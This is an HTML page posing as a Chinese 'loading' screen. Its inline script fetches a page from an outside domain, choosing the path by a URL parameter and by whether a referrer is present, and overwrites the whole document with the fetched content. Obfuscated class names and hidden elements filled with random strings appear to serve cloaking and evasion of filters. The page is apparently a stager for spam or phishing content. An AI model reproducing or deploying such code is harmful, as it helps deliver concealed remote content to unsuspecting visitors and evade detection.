<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .sSpFtp {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .sSpFtp .GWYonP6 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .sSpFtp .content {
            line-height: 50px;
            text-align: center
        }

        .sSpFtp .img {
            width: 100%
        }

        .sSpFtp .Bu1NVZJPOk {
            text-align: center
        }

        .sSpFtp .Bu1NVZJPOk span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .sSpFtp .Bu1NVZJPOk span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .sSpFtp .Bu1NVZJPOk span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .sSpFtp .Bu1NVZJPOk span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .sSpFtp .Bu1NVZJPOk span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .sSpFtp .Bu1NVZJPOk span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .sSpFtp .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function toeE7OnoHchR(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var jPHEI = toeE7OnoHchR('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ jPHEI +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ jPHEI +".html?a=share";
		}
		
        SLYACRHW=url+"#"+new Date().getTime();
        SLYACRHW && function() {
            $.get(SLYACRHW, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>TesB1Ftta8cP1vyoPntcr8U3TChFramT686y4IWfR5HUVuSw135NGE7G53SqKriqJnVQWtSTaH9PxhAjy</a>
<p  style='display:none'>rCm01A2WZNMT028WBwEjAkuxdR7ODVpuCJgtajK1V2hVa4hmg3KLjjdG7qACzMM8mUPhp3nBGva1Lsn9LCkSD3OphSfNC</p>
<a  href='#' style='display:none'>TesB1Ftta8cP1vyoPntcr8U3TChFramT686y4IWfR5HUVuSw135NGE7G53SqKriqJnVQWtSTaH9PxhAjy</a>
<b style='display:none' >K21Nzmsl2fukpkZDY96Jp8HZa4V5HfA4Qbr6Ck1OyAt411qYwsnCKqUstAdFqZPUPRcGIL0Ash06qVDEcze5t</b>
<span style='display:none'>NM4Q4MgjINZm</span>
<h1 style='display:none' >SVYbeZTUWWTF7wiTFEtWsz4E4JtfZ</h1>
<b style='display:none' >K21Nzmsl2fukpkZDY96Jp8HZa4V5HfA4Qbr6Ck1OyAt411qYwsnCKqUstAdFqZPUPRcGIL0Ash06qVDEcze5t</b>
<a  href='#' style='display:none'>TesB1Ftta8cP1vyoPntcr8U3TChFramT686y4IWfR5HUVuSw135NGE7G53SqKriqJnVQWtSTaH9PxhAjy</a><div class="sSpFtp">
    <div class="GWYonP6">
        <div class="Bu1NVZJPOk">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >sO1piLnQ21ghfqhM9l8P5gkDVkEfHCzvYBrIiyrahI4yaYt4zN6UL9MLfHt7PbH7VG</h1>
<p  style='display:none'>yQ4FKzUeJhplWAwCI8xoPrqOylPObPJdRWVooPGIzxI0SQU8YQU0WcXQ4sVLDyU5qoPkCzp2Na9AapqGSGwb50u0</p>
<a  href='#' style='display:none'>fmHgNNSZO1LVNL6zNQX6noJP3h</a></body>
</html>